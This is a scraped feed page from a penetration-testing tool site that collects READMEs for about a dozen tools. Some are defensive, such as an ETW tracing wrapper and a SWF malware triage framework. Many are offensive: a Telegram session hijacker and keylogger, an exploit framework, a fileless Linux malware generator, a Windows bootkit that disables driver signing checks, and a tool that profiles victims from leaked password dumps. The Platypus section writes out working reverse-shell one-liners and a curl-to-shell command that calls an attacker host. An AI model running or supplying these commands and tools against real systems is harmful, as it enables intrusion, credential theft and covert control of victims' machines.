Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

0D1N v2.6 - Web Security Tool To Make Fuzzing At HTTP/S

$
0
0

0d1n is a tool for automating customized attacks against web applications.

You can do:

  • Brute force login and passwords in auth forms
  • Directory disclosure (use PATH list to brute, and find HTTP status code)
  • Test to find SQL Injection and XSS vulnerabilities
  • Options to load ANTI-CSRF token each request
  • Options to use random proxy per request
  • Other functions...

Old Versions:
http://sourceforge.net/projects/odin-security-tool/files/?source=navbar


To run:
require libcurl-dev or libcurl-devel(on rpm linux based)
$ git clone https://github.com/CoolerVoid/0d1n/
need libcurl to run
$ sudo apt-get install libcurl-dev
if rpm distro
$ sudo yum install libcurl-devel
$ make
$./0d1n
Read the docs



pwnedOrNot v1.1.7 - OSINT Tool To Find Passwords For Compromised Email Addresses

$
0
0

pwnedOrNot uses haveibeenpwned v2 api to test email accounts and tries to find the password in Pastebin Dumps.

Features
haveibeenpwned offers a lot of information about the compromised email, some useful information is displayed by this script:
  • Name of Breach
  • Domain Name
  • Date of Breach
  • Fabrication status
  • Verification Status
  • Retirement status
  • Spam Status
And with all this information pwnedOrNot can easily find passwords for compromised emails if the dump is accessible and it contains the password

Tested on
  • Kali Linux 18.2
  • Ubuntu 18.04
  • Kali Nethunter
  • Termux

Installation
Ubuntu / Kali Linux / Nethunter / Termux
chmod 777 install.sh
./install.sh


Usage
python3 pwnedornot.py -h

usage: pwnedornot.py [-h] [-e EMAIL] [-f FILE] [-d DOMAIN] [-n] [-l]
[-c CHECK]

optional arguments:
-h, --help show this help message and exit
-e EMAIL, --email EMAIL Email Address You Want to Test
-f FILE, --file FILE Load a File with Multiple Email Addresses
-d DOMAIN, --domain DOMAIN Filter Results by Domain Name
-n, --nodumps Only Check Breach Info and Skip Password Dumps
-l, --list Get List of all pwned Domains
-c CHECK, --check CHECK Check if your Domain is pwned

# Examples

# Check Single Email
python3 pwnedornot.py -e <email>
#OR
python3 pwnedornot.py --email <email>

# Check Multiple Emails from File
python3 pwnedornot.py -f <file name>
# OR
python3 pwnedornot.py --file <file name>

# Filter Result for a Domain Name [Ex : adobe.com]
python3 pwnedornot.py -e <email> -d <domain name>
#OR
python3 pwnedornot.py -f <file name> --domain <domain name>

# Get only Breach Info, Skip Password Dumps
python3 pwnedornot.py -e <email> -n
#OR
python3 pwnedornot.py -f <file name> --nodumps

# Get List of all Breached Domains
python3 pwnedornot.py -l
#OR
python3 pwnedornot.py --list

# Check if a Domain is Pwned
python3 pwnedornot.py -c <domain name>
#OR
python3 pwnedornot.py --check <domain name>


Demo



TeleKiller - A Tool Session Hijacking And Stealer Local Passcode Telegram Windows

$
0
0

A Tools Session Hijacking And Stealer Local passcode Telegram Windows.

Features :
  • Session Hijacking
  • Stealer Local Passcode
  • Keylogger
  • Shell
  • Bypass 2 Step Verification
  • Bypass Av (Coming Soon)

Installation Windows
git clone https://github.com/ultrasecurity/TeleKiller.git
cd TeleKiller
pip install -r requirements.txt
python TeleKiller.py

Dependency :
  • python 2.7
  • pyHook
  • pywin32

Video Tutorial


Operating Systems Tested
  • Windows 10
  • Windows 8.1
  • Windows 8
  • Windows 7

Contact

Thanks to
Milad Ranjbar
MrQadir


Zeebsploit - Web Scanner / Exploitation / Information Gathering

$
0
0

zeebsploit is a tool for hacking

searching for web information and

scanning vulnerabilities of a web



Installation & Usage
apt-get install git
git clone https://github.com/jaxBCD/Zeebsploit.git
cd Zeebsploit
chmod +x install
./install
python3 zeebsploit.py
type 'help' for show modules
and follow instruction

Modules
[Main modules]
+----------+-------------------------------+
| Modules | Description |
+----------+-------------------------------+
| Exploit | Exploitation Modules |
| Scanners | Scanners Modules |
| infoga | information Gathering Modules |
+----------+-------------------------------+

[Exploit Modules]
+---------------------------+--------------------------------------------------+
| Modules | Description |
+---------------------------+--------------------------------------------------+
| wp content injection | wordpress content injection version 4.7 or 4.7.1 |
| wp revslider | wordpress plugin revslider remote file upload |
| wp learndash | wordpress leardash remote file upload |
| wp swhobiz | wordpress plugin showbiz remote file upload |
| joomla com fabrik | joomla component fabrik file upload |
| joomla manager get config | joomla component manager auto get config |
| joomla jdownload | joomla component jdownloads remote file upload |
| joomla | Joomla ads manager component auto shell upload |
| apache struts rce | CVE: 2017-5638 - Apache Struts2 S2-045 |
| | remote command execution |
| drupal8 rce | drupal version 8 remote command execution |
| dvr cam leak credential | TBK DVR4104 / DVR4216 |
| | - Credentials Leak (Get User and password |
| webdav file upload | Nothing |
| ---More--- | Coming Soon the following version |
+---------------------------+--------------------------------------------------+

[Scanner Module]
+--------------------+----------------------------------------+
| Modules | Description |
+--------------------+----------------------------------------+
| subdomain scanner | Scan Subdomain for Web |
| sqli scanner | Scan Sql Injection Vulnerability |
| xss scanner | Scan XSS Injection Vulnerability |
| lfi scanner | Local File Includes Scanner etc/passwd |
| admin login finder | Scan Admin Login page |
| directory scanner | scan directory on web us e dirhunt |
| subdomain takeover | scan type subdomain takeover |
| ---More--- | Coming Soon the following version |
+--------------------+----------------------------------------+

[Information Gathering]

+--------------------+------------------------------------------+
| Modules | Description |
+--------------------+------------------------------------------+
| cms detector | a tool for detecting cms on a web |
| port scanner | Scan Open Port use Nmap |
| information header | response header information |
| ip geolocation | detect the location of an ip or host |
| email searcher | searching email from web |
| traceroute | to show the route the package has pas sed |
| robot.txt detector | Scan Robot.txt from Web |
| header information | Response Header Checker |
| whois lookup | looking for registered users or |
| | recipients of Internet resource rights |
| ---More--- | Coming Soon the following version |
+--------------------+------------------------------------------+

Join Team : [Click This]
Contact : [Contact]


W12Scan - A Simple Asset Discovery Engine For Cybersecurity

$
0
0

Chinese
W12scan is a network asset discovery engine that can automatically aggregate related assets for analysis and use.

Here is a web source program, but the scanning end is at w12scan-client

Thinking
Based on python3 + django + elasticsearch + redis and use the web restful api to add scan targets.
<g-emoji alias=rocket class=g-emoji fallback-src=https://github.githubassets.com/images/icons/emoji/unicode/1f680.png>&#128640;</g-emoji> A simple asset discovery engine for cybersecurity. (&#32593;&#32476;&#36164;&#20135;&#21457;&#29616;&#24341;&#25806;) (2)

Feature

Web
  • Powerful search syntax
    • Search for cms, service, titles, country regions, etc., to quickly find relevant targets.
      • title=“abc” # Search from the title
      • header=“abc” # Search from http header
      • body=“123” # Search from body text
      • url = “*.baidu.com” # Search for subdomains of baidu.com
      • ip = ‘1.1.1.1’ # Search from IP,support '192.168.1.0/24' and '192.168.1.*'
      • port = ‘80’ # Search form port
      • app = ’nginx’ # Search application
      • country = ‘cn’ # Search from country
      • service = ‘mysql’ # Search from service
      • bug = 'xx' # Search from Vulnerability
  • Custom assert
    • By customizing a company-related domain name or ip asset, w12scan will automatically help you find the corresponding asset target. When you browse the target, there is a prominent logo to remind you of the target's ownership.
  • Automatic association
    • Enter the target details. If the target is ip, all domain names on the ip and all domain names on the c class will be automatically associated. If the target is a domain name, the adjacent station, segment c and subdomain are automatically associated.
  • Multi-node management
    • WEB will check the status of the node every few minutes, you can see the number of node scans and the node scan log.
  • Task restful
    • Provides an interface to add tasks, you can add it on the WEB side or integrate it in any software.

Scanning end
  • Poc
    • Call the latest poc script online via airbug
  • Built-in scan script
    • Common vulnerability verification service built into the scanner.
  • Scanning
    • Use masscan,nmap,wappalyzer,w11scan
  • Easy to distribute
    • This is taken into account in the design of the program architecture. It is very easy to distribute and run the scan terminal directly on another machine. It also can be distributed based on docker, celery service.

Installation
Quickly build an environment with docker
git clone https://github.com/boy-hack/w12scan
cd w12scan
docker-compose up -d
Wait a while to visit http://127.0.0.1:8000

Telegram Group
Telegram Group:https://t.me/joinchat/MZ16xA9dfmJCYm4kbv15nA


Pepe - Collect Information About Email Addresses From Pastebin

$
0
0

Collect information about leaked email addresses from Pastebin

About
Script parses Pastebin email:password dumps and gather information about each email address. It supports Google, Trumail, Pipl, FullContact and HaveIBeenPwned. Moreover, it allows you to send an informational mail to person about his leaked password, at the end every information lands in Elasticsearch for further exploration.

It supports only one format - email:password.
Everything else will not work!
For now, notification works when it finds match on FullContact and next sends you email address and associated social media accounts.

Requirements:
pip install -r requirements

Config
{"domains": 
{ #domains to whitelist or blacklist
"whitelist": [""],
"blacklist": ["yahoo.com"]
},
"keys":
{ #API KEYS
"pushsafer": "API_KEY",
"fullcontact": "API_KEY",
"pipl": "API_KEY"
},
"gmail":
{ #GMAIL credentials and informational message that will be send
"username": "your_username@gmail.com",
"password": "password",
"message": "Hey,\n\nI am a security researcher and I want to inform you that your password !PASSWORD! has been leaked and you should change it immediately.\nThis email is part of the research, you can find more about it on https://medium.com/@wojciech\n\nStay safe!"},
"elasticsearch":
{ #ElasticSearch connection info
"host": "127.0.0.1",
"port": 9200}
}

Usage
root@kali:~/PycharmProjects/pepe# python pepe.py -h
usage: pepe.py [-h] [--file FILE] [--stream] [--interactive]
[--modules MODULES [MODULES ...]] [--elasticsearch]
[--whitelist] [--blacklist]

,=.
,=''''==.__.=" o".___
,=.==" ___/
,==.," , , \,===""
< ,==) "'"=._.==) `=='' `" `

clover/snark^
http://ascii.co.uk/art/platypus

Post Exploitation Pastebin Emails
github.com/woj-ciech
medium.com/@woj_ciech

Example:
python pepe.py --file <dump.txt> --interactive --whitelist
python pepe.py --file <dump.txt> --modules hibp google trumail --elasticsearch --blacklist

optional arguments:
-h, --help show this help message and exit
--file FILE Load file
--stream Stream Pastebin
--interactive Interactive mode
--modules MODULES [MODULES ...]
Modules to check in non-interactive mode
--elasticsearch Output to ElasticSearch
--whitelist Whitelist
--blacklist Blacklist

Example
Interactive mode, each email is checked individually and specific module is executed.
root@kali:~/PycharmProjects/pepe# python pepe.py --file paste.txt --interactive --blacklist

-----------------------Found email [REDACTED]@hotmail.com with password [REDACTED]-----------------------
[A] Add domain hotmail.com to blacklist
[T] Test
[G] Google search
[H] HaveIBeenPwned
[P] Pipl
[F] FullContact
[I] Inform
[N] Next
> G
---Google Search---
http://[REDACTED]
http://[REDACTED]
http://[REDACTED]

[A] Add domain gmail.com to blacklist
[T] Test
[G] Google search
[H] HaveIBeenPwned
[P] Pipl
[F] FullContact
[I] Inform
[N] Next
> N
-----------------------Found email [REDACTED].[REDACTED]@gmail.com with password [REDACTED]-----------------------
[A] Add domain gmail.com to blacklist
[T] Test
[G] Google search
[H] HaveIBeenPwned
[P] Pipl
[F] FullContact
[I] Inform
[N] Next
> F
---FullContact---
[REDACTED] [REDACTED]< br/>https://twitter.com/[REDACTED]
https://facebook.com/[REDACTED]
https:/linkedin.com/[REDACTED]
[A] Add domain gmail.com to blacklist
[T] Test
[G] Google search
[H] HaveIBeenPwned
[P] Pipl
[F] FullContact
[I] Inform
[N] Next
> P
---Pipl---
Name: [REDACTED]
[REDACTED] years old
Jobs:
Quality Control [REDACTED] (since 2018)
[REDACTED] Review [REDACTED] (2017-2018)
[REDACTED] Attorney [REDACTED] (2017-2018)
[REDACTED] Attorney at [REDACTED] (2017-2017)
...
[REDACTED] (2012-2012)
[REDACTED] Assistant at [REDACTED] (2012-2012)
Author/Founder at [REDACTED] (2009-2011)
https://www.linkedin.com/in/[REDACTED]
http://www.facebook.com/people/[REDACTED]
http://twitter.com/[REDACTED]
http://pinterest.com/[REDACTED]
https://plus.google.com/[REDACTED]

...
[REDACTED]
Non-interactive mode, when only choosen modules are executed against email addressess.
root@kali:~/PycharmProjects/# python pepe.py --file pastetest.txt --blacklist --modules hibp google fullcontact trumail --elasticsearch
-----------------------Found email [REDACTED]@hotmail.com with password [REDACTED]-----------------------
---Google Search---
https://pastebin.com/[REDACTED]
---Have I Been Pwned---
LinkedIn
---FullContact---
No results
---Trumail---
Email test passed
-----------------------Found email charlie.[REDACTED]@live.com with password [REDACTED]-----------------------
---Google Search---
https://justpaste.it/[REDACTED]
https://pastebin.com/[REDACTED]
---Have I Been Pwned---
MyHeritage
RiverCityMedia
Tumblr
YouveBeenScraped
---FullContact---
Charlie [REDACTED]
https://twitter.com/[REDACTED]
[REDACTED]
---Trumail---
Email test passed
-----------------------Found email [REDACTED].[REDACTED]@gmail.com with password [REDACTED]-----------------------
---Google Search---
http://[REDACTED]
http://[REDACTED]
http://[REDACTED]
https://pastebin.com/[REDACTED]
---Have I Been Pwned---
BTSec
Exactis
HauteLook
Houzz
LinkedIn
---FullContact---
[REDACTED] [REDACTED]
https://www.facebook.com/[REDACTED]
[REDACTED]
---Trumail---
Email test passed
-----------------------Found email [REDACTED].[REDACTED]@gmail.com with password [REDACTED]-----------------------
---Google Search---
https://[REDACTED]
https://[REDACTED]
https://[REDACTED]
https://pastebin.com/[REDACTED]
---Have I Been Pwned---
Lastfm
LinkedIn
MySpace
Trillian
Tumblr
---FullContact---
[REDACTED] [REDACTED] [REDACTED].
https://www.facebook.com/[REDACTED]
https://plus.google.com/[REDACTED]
https://www.linkedin.com/in/[REDACTED]
http://www.pinterest.com/[REDACTED]
https://twitter.com/[REDACTED]
https://youtube.com/user/[REDACTED]
[REDACTE D]

Screens





Instantbox - Get A Clean, Ready-To-Go Linux Box In Seconds

$
0
0

Get a clean, ready-to-go Linux box in seconds.

Introduction

What is instantbox?
It's a project that spins up temporary Linux systems with instant webshell access from any browser.

What can an instantbox do?
  1. provides a clean Linux environment for a presentation
  2. let students experience the charm of Linux at your school or your next LUG meet
  3. run with an inspiration in a clean environment
  4. manage servers from any device
  5. experiment with an open source project
  6. test software performance under resource constraints
and more! ideas are endless...

Which Linux distributions are available?
We currently supports various versions of Ubuntu, CentOS, Arch Linux, Debian, Fedora and Alpine.

Deploy
Prerequisite: docker [More Information]
mkdir instantbox && cd $_
bash <(curl -sSL https://raw.githubusercontent.com/instantbox/instantbox/master/init.sh)

Questions
Please submit an issue or join the conversation on telegram.


SilkETW - Flexible C# Wrapper For ETW (Event Tracing for Windows)

$
0
0

SilkETW is a flexible C# wrapper for ETW, it is meant to abstract away the complexities of ETW and give people a simple interface to perform research and introspection. While SilkETW has obvious defensive (and offensive) applications it is primarily a research tool in it's current state.
For easy consumption, output data is serialized to JSON. The JSON data can either be analyzed locally using PowerShell or shipped off to 3rd party infrastructure such as Elasticsearch.

Implementation Details

Libraries
SilkETW is buit on .Net v4.5 and uses a number of 3rd party libraries, as shown below. Please see LICENSE-3RD-PARTY for further details.
ModuleId                                 Version LicenseUrl                                                   
-------- ------- ----------
McMaster.Extensions.CommandLineUtils 2.3.2 https://licenses.nuget.org/Apache-2.0
Microsoft.Diagnostics.Tracing.TraceEvent 2.0.36 https://github.com/Microsoft/perfview/blob/master/LICENSE.TXT
Newtonsoft.Json 12.0.1 https://licenses.nuget.org/MIT
System.ValueTuple 4.4.0 https://github.com/dotnet/corefx/blob/master/LICENSE.TXT
YaraSharp 1.3.1 https://github.com/stellarbear/YaraSharp/blob/master/LICENSE

Command Line Options
Command line usage is fairly straight forward and user input is validated in the execution prologue. See the image below for further details.


JSON Output Structure
The JSON output, prior to serialization, is formatted according to the following C# struct.
public struct EventRecordStruct
{
public Guid ProviderGuid;
public List<String> YaraMatch;
public string ProviderName;
public string EventName;
public TraceEventOpcode Opcode;
public string OpcodeName;
public DateTime TimeStamp;
public int ThreadID;
public int ProcessID;
public string ProcessName;
public int PointerSize;
public int EventDataLength;
public Hashtable XmlEventData;
}
Note that, depending on the provider and the event type, you will have variable data in the XmlEventData hash table. Sample JSON output can be seen below for "Microsoft-Windows-Kernel-Process" -> "ThreadStop/Stop".
{
"ProviderGuid":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716",
"YaraMatch":[

],
"ProviderName":"Microsoft-Windows-Kernel-Process",
"EventName":"ThreadStop/Stop",
"Opcode":2,
"OpcodeName":"Stop",
"TimeStamp":"2019-03-03T17:58:14.2862348+00:00",
"ThreadID":11996,
"ProcessID":8416,
"ProcessName":"",
"PointerSize":8,
"EventDataLength":76,
"XmlEventData":{
"FormattedMessage":"Thread 11,996 (in Process 8,416) stopped. ",
"StartAddr":"0x7fffe299a110",
"ThreadID":"11,996",
"UserStackLimit":"0x3d632000",
"StackLimit":"0xfffff38632d39000",
"MSec":"560.5709",
"TebBase":"0x91c000",
"CycleTime":"4,266,270",
"ProcessID":"8,416",
"PID":"8416",
"StackBase":"0xfffff38632d40000",
"SubProcessTag":"0",
"TID":"11996",
"ProviderName":"Microsoft-Windows-Kern el-Process",
"PName":"",
"UserStackBase":"0x3d640000",
"EventName":"ThreadStop/Stop",
"Win32StartAddr":"0x7fffe299a110"
}
}

Usage

Filter data in PowerShell
You can import JSON output from SilkETW in PowerShell using the following simple function.
function Get-SilkData {
param($Path)
$JSONObject = @()
Get-Content $Path | ForEach-Object {
$JSONObject += $_ | ConvertFrom-Json
}
$JSONObject
}
In the example below we will collect process event data from the Kernel provider and use image loads to identify Mimikatz execution. We can collect the required data with the following command.
SilkETW.exe -t kernel -kk ImageLoad -ot file -p C:\Users\b33f\Desktop\mimikatz.json
With data in hand it is easy to sort, grep and filter for the properties we are interested in.


Yara
SilkETW includes Yara functionality to filter or tag event data. Again, this has obvious defensive capabilities but it can just as easily be used to augment your ETW research.
In this example we will use the following Yara rule to detect Seatbelt execution in memory through Cobalt Strike's execute-assembly.
rule Seatbelt_GetTokenInformation
{
strings:
$s1 = "ManagedInteropMethodName=GetTokenInformation" ascii wide nocase
$s2 = "TOKEN_INFORMATION_CLASS" ascii wide nocase
$s3 = /bool\(native int,valuetype \w+\.\w+\/\w+,native int,int32,int32&/
$s4 = "locals (int32,int64,int64,int64,int64,int32& pinned,bool,int32)" ascii wide nocase

condition:
all of ($s*)
}
We can start collecting .Net ETW data with the following command. The "-yo" option here indicates that we should only write Yara matches to disk!
SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 -l verbose -y C:\Users\b33f\Desktop\yara -yo matches -ot file -p C:\Users\b33f\Desktop\yara.json
We can see at runtime that our Yara rule was hit.


Note also that we are only capturing a subset of the "Microsoft-Windows-DotNETRuntime" events (0x2038), specifically: JitKeyword, InteropKeyword, LoaderKeyword and NGenKeyword.

Changelog
For details on version specific changes, please refer to the Changelog.



Platypus - A Modern Multiple Reverse Shell Sessions Manager Written In Go

$
0
0

A modern multiple reverse shell sessions/clients manager via terminal written in go.

Features
  • Multiple service listening port
  • Multiple client connections
  • RESTful API
  • Reverse shell as a service

Screenshot



Network Topology
Attack IP: 192.168.1.2
Reverse Shell Service: 0.0.0.0:8080
RESTful Service: 127.0.0.1:9090
Victim IP: 192.168.1.3

Run Platypus from source code
go get github.com/WangYihang/Platypus
cd go/src/github.com/WangYihang/Platypus
go run platypus.go

Run Platypus from release binaries
// Download binary from https://github.com/WangYihang/Platypus/releases
chmod +x ./Platypus_linux_amd64
./Platypus_linux_amd64

Victim side
nc -e /bin/bash 192.168.1.2 8080
bash -c 'bash -i >/dev/tcp/192.168.1.2/8080 0>&1'
zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.1.2 8080 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.2:8080

Reverse shell as a Service
// Platypus is able to multiplexing the reverse shell listening port
// The port 8080 can receive reverse shell client connection
// Also these is a Reverse shell as a service running on this port

// victim will be redirected to attacker-host attacker-port
// sh -c "$(curl http://host:port/attacker-host/attacker-port)"
# curl http://192.168.1.2:8080/attacker.com/1337
bash -c 'bash -i >/dev/tcp/attacker.com/1337 0>&1'
# sh -c "$(curl http://192.168.1.2:8080/attacker.com/1337)"

// if the attacker info not specified, it will use host, port as attacker-host attacker-port
// sh -c "$(curl http://host:port/)"
# curl http://192.168.1.2:8080/
curl http://192.168.1.2:8080/192.168.1.2/8080|sh
# sh -c "$(curl http://host:port/)"

RESTful API
  • GET /client List all online clients
# curl 'http://127.0.0.1:9090/client'
{
"msg": [
"192.168.1.3:54798"
],
"status": true
}
  • POST /client/:hash execute a command on a specific client
# curl -X POST 'http://127.0.0.1:9090/client/0723c3bed0d0240140e10a6ffd36eed4' --data 'cmd=whoami'
{
"status": true,
"msg": "root\n",
}
  • How to hash?
# echo -n "192.168.1.3:54798" | md5sum
0723c3bed0d0240140e10a6ffd36eed4 -


FLASHMINGO - Automatic Analysis Of SWF Files Based On Some Heuristics

$
0
0

Automatic Analysis Of SWF Files Based On Some Heuristics. Extensible Via Plugins.

Install
Install the Python (2.7) packages listed in requirements.txt.
You can use the following command: pip install -r requirements.txt
If you want to use the decompilation functionality you need to install Jython. Ubuntu/Debian users can issue apt install jython
Clone the project or download the zip file.

What
FLASHMINGO is an analysis framework for SWF files. The tool automatically triages suspicious Flash files and guides the further analysis process, freeing precious resources in your team. You can easily incorporate FLASHMINGO’s analysis modules into your workflow.

Why
To this day forensic investigators and malware analysts must deal with suspicious SWF files. If history repeats itself the security threat may even become bigger beyond Flash’s end of life in 2020. Systems will continue to support a legacy file format that is not going to be updated with security patches anymore. Automation is the best way to deal with this issue and this is where FLASHMINGO can help you. FLASHMINGO is an analysis framework to automatically process SWF files that enables you to flag suspicious Flash samples and analyze them with minimal effort. It integrates into various analysis workflows as a stand-alone application or a powerful library. Users can easily extend the tool’ s functionality via custom Python plugins.

How

Architecture
FLASHMINGO is designed with simplicity in mind. It reads a SWF file and creates an object (SWFObject) representing its contents and structure. Afterwards FLASHMINGO runs a series of plugins acting on this SWFObject and returning their values to the main program.
Below a mandatory ASCII art flow diagram:
                                                 +----------+
| |
+------------+----------->+ PLUGIN 1 +------------+
| | | | |
| | +----------+ |
| | |
| | +----------+ |
| | | | |
+---------+ | +----------->+ PLUGIN 2 +--------+ |
|SWF FILE +----------->+ FLASHMINGO | | | | |
+---------+ | | +----------+ | |
| | | |
| | | |
| | | |
| | +-----v---v-+
| | | |
| | | |
+-----+------+------------------------->+ SWFOBJECT |
^ | |
| | |
| +-----+-----+
| |
| |
| |
+---------------------------------------+
When using FLASHMINGO as a library in your own projects, you only need to take care of two kind of objects:
  • one or many SWFObject(s), representing the sample(s)
  • a Flashmingo object. This acts essentially as a harness connecting plugins and SWFObject(s).

Plugins!
FLASHMINGO plugins are stored in their own directories under... you guessed it: plugins When a Flashmingo object is instantiated, it goes through this directory and process all plugins' manifests. Should this indicate that the plugin is active, this is registered for later use. At the code level, this means that a small plugin_info dictionary is added to the plugins list.
Plugins are invoked via the run_plugin API with two arguments:
  • the plugin's name
  • the SWFObject instance
Optionally, most of the plugins allow you to pass your own user data. This is plugin dependent (read the documentation) and it can be more easily be explained with an example. The default plugin SuspiciousNames will search all constant pools for strings containing suspicious substrings (for example: 'overflow', 'spray', 'shell', etc.) There is a list of common substrings already hard-coded in the plugin so that it can be used as-is. However, you may pass a list of your own defined substrings, in this case via the names parameter.
Code example:
fm = Flashmingo()
print fm.run_plugin('DangerousAPIs', swf=swf)
print fm.run_plugin('SuspiciousNames', swf=swf, names=['spooky'])

Default plugins
FLASHMINGO ships with some useful plugins out of the box:
  • binary_data
  • dangerous_apis
  • decompiler
  • suspicious_constants
  • suspicious_loops
  • suspicious_names
  • template :)

Extending FLASHMINGO
A template plugin is provided for easy development. Extending FLASHMINGO is rather straightforward. Follow these simple steps:
  • Copy the template
  • Edit the manifest
  • Override the run method
  • Add your custom code
You are ready to go :)

FLASHMINGO as a library

API
  • See the docs directory for autogenerated documentation
  • See FireEye's blog post for an example

Front-ends
  • Console

Create Documentation
$ pip install sphinxcontrib-napoleon
After setting up Sphinx to build your docs, enable napoleon in the Sphinx conf.py file:
In conf.py, add napoleon to the extensions list
extensions = ['sphinxcontrib.napoleon']
Use sphinx-apidoc to build your API documentation:
$ sphinx-apidoc -f -o docs/source projectdir
This creates .rst files for Sphinx to process
$ make html
That's it! :)


fireELF - Fileless Linux Malware Framework

$
0
0

fireELF is a opensource fileless linux malware framework thats crossplatform and allows users to easily create and manage payloads. By default is comes with 'memfd_create' which is a new way to run linux elf executables completely from memory, without having the binary touch the harddrive.

Features
  • Choose and build payloads.
  • Ability to minify payloads.
  • Ability to shorten payloads by uploading the payload source to a pastebin, it then creates a very small stager compatible with python <= 2.7 which allows for easy deployment.
  • Output created payload to file.
  • Ability to create payload from either a url or a local binary.

Included payload memfd_create
The only included payload 'memfd_create' is based on the research of Stuart, this payload creates an anonymous file descriptor in memory it then uses fexecve to execute the binary directly from the file descriptor. This allows for the execution completely in memory which means that if the linux system gets restarted, the payload will be no where to be found.

Creating a Payload
By default fireELF comes with 'memfd_create' but users can develop their own payloads. By default the payloads are stored in payloads/ and in order to create a valid payload you simply need to include a dictonary named 'desc' with the parameters 'name', 'description', 'archs', and 'python_vers'. An example desc dictonary is below:
desc = {"name" : "test payload", "description" : "new memory injection or fileless elf payload", "archs" : "all", "python_vers" : ">2.5"}
In addition to the 'desc' dictonary the entry point the plugin engine i built uses requires a main function which will automatically get passed two parameters, one is a boolean that if its true it means its getting passed a url the second parameter it gets passed is the data. An example of a simple entry point is below:
def main(is_url, url_or_payload):
return
If you have a method feel free to commit a payload!

Screenshots



Installation
Download the dependencies by running:
pip3 -U -r dep.txt
fireELF is developed in Python 3.x.x

Usage
usage: main.py [-h] [-s] [-p PAYLOAD_NAME] [-w PAYLOAD_FILENAME]
(-u PAYLOAD_URL | -e EXECUTABLE_PATH)

fireELF, Linux Fileless Malware Generator

optional arguments:
-h, --help show this help message and exit
-s Supress Banner
-p PAYLOAD_NAME Name of Payload to Use
-w PAYLOAD_FILENAME Name of File to Write Payload to (Highly Recommended if
You're not Using the Paste Site Option)
-u PAYLOAD_URL Url of Payload to be Executed
-e EXECUTABLE_PATH Location of Executable


EfiGuard - Disable PatchGuard And DSE At Boot Time

$
0
0
EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager, boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).

Features
  • Currently supports all EFI-compatible versions of Windows x64 ever released, from Vista SP1 to Server 2019.
  • Easy to use: can be booted from a USB stick via a loader application that automatically finds and boots Windows. The driver can also be loaded and configured manually using either the UEFI shell or the loader.
  • Makes extensive use of the Zydisdisassembler library for fast runtime instruction decoding to support more robust analysis than what is possible with signature matching, which often requires changes with new OS updates.
  • Works passively: the driver does not load or start the Windows boot manager. Instead it acts on a load of bootmgfw.efi by the firmware boot manager via the boot selection menu or an EFI application such as the loader. If a non-Windows OS is booted, the driver will automatically unload itself.
  • Supports four-stage patching for when bootmgfw.efi starts bootmgr.efi rather than winload.efi. This is the case when a WIM file is loaded to boot WinPE, Windows Setup or Windows Recovery mode.
  • Graceful recovery: in case of patch failure, the driver will display error information and prompt to continue booting or to reboot by pressing ESC. This is true even up to the final kernel patch stage, because the last patch stage happens before ExitBootServices is called. Many UEFI Windows bootkits hook OslArchTransferToKernel which, while easy to find by pattern matching, is a function that executes in protected mode after ExitBootServices. This means no boot services are available to tell the user that something went wrong. 
  • Simulated patch failure with error information
  • Debuggable: can output messages to a kernel debugger and to the screen (albeit buffered) during the kernel patching stage, and to a serial port or unbuffered to the screen during the boot manager and boot loader patching stages. If the driver is compiled with PDB debug information, it is possible to load the debug symbols at any point after HAL initialization by specifying the virtual DXE driver base and debugging it as you would a regular NT driver.
  • DSE bypasses: available as either a straightforward UPGDSED-style DSE disable at boot time or as a hook on the SetVariable() EFI runtime service. The latter serves as an arbitrary kernel mode read/write backdoor that can be called from Windows using NtSetSystemEnvironmentValueEx and allows setting g_CiEnabled/g_CiOptions to the desired value. A small DSEFix-style application named EfiDSEFix.exe is provided that can be used to do this. It is also possible to leave DSE enabled and to disable only PatchGuard. The loader will use the SetVariable hook method by default, due to the fact that some anti-cheat and anti-virus programs do not understand the difference between cheats or malware and self-signed drivers in general and target the UPGDSED fix.
  • Supports on-disk modified kernels and boot loaders by patching ImgpValidateImageHash at every stage as well as ImgpFilterValidationFailure, which may silently rat out some classes of violations to a TPM or the SI log file.
  • Allows Secure Boot to work with Windows 7 (not a joke!). Windows 7 itself is oblivious to Secure Boot as it does not support it, or (officially) even booting without CSM. This is useful for people who want to use Windows 7 on a locked down device that requires WHQL Secure Boot. Wiki entry on how to get this to work here

Issues and limitations
  • EfiGuard can not disable Hypervisor-enforced Code Integrity (HVCI or HyperGuard) due to HVCI running at a greater privilege level. EfiGuard can coexist with HVCI and even successfully disables PatchGuard in the normal kernel, but this is not useful in practice because HVCI will catch what PatchGuard did previously. Both types of DSE bypass are rendered useless by HVCI: the boot time patch has no effect because the kernel defers to the secure kernel for integrity checks, and the SetVariable hook will cause a SECURE_KERNEL_ERROR bugcheck if it is used to write to g_CiOptions.
  • Checked kernels are not supported due to the differences in PatchGuard and DSE initialization code caused by disabled optimizations and added asserts, as well as additional changes to PatchGuard in checked kernels. This should not be an issue as checked kernels are not generally useful without a kernel debugger attached, which disables PatchGuard.
  • The loader application is currently not directly bootable on some PCs (e.g. Dell XPS). In this case the UEFI shell can be used as a fallback (see below).

How to use
There are two ways to use EfiGuard: booting the loader (easiest), or using the UEFI shell to load the driver.

Booting the loader
  1. Download or compile EfiGuard, go to EFI/Boot and rename one of Loader.efi or Loader.config.efi to bootx64.efi. The two are identical, except Loader.efi boots without user interaction whereas Loader.config.efi will prompt you to configure the DSE patch method used by the driver (if you want to change this).
  2. Place the files on a boot drive such as a USB stick (for physical machines) or an ISO/virtual disk (for VMs). The paths should be /EFI/Boot/{bootx64|EfiGuardDxe}.efi. It is recommended to use FAT32 formatted USB sticks.
  3. Boot the machine from the new drive instead of booting Windows. Most firmwares provide a boot menu to do this (accessible via F10/F11/F12). If not, you will need to configure the BIOS to boot from the new drive.
  4. If you are using the default loader, Windows should now boot, and you should see EfiGuard messages during boot. If you are using the configurable loader, answer the configuration prompts and Windows will boot.
  5. If you booted with the SetVariable hook (the default), run EfiDSEFix.exe -d from a command prompt after boot to disable DSE. Run EfiDSEFix.exe to see the full list of options.

Using the UEFI shell to load the driver
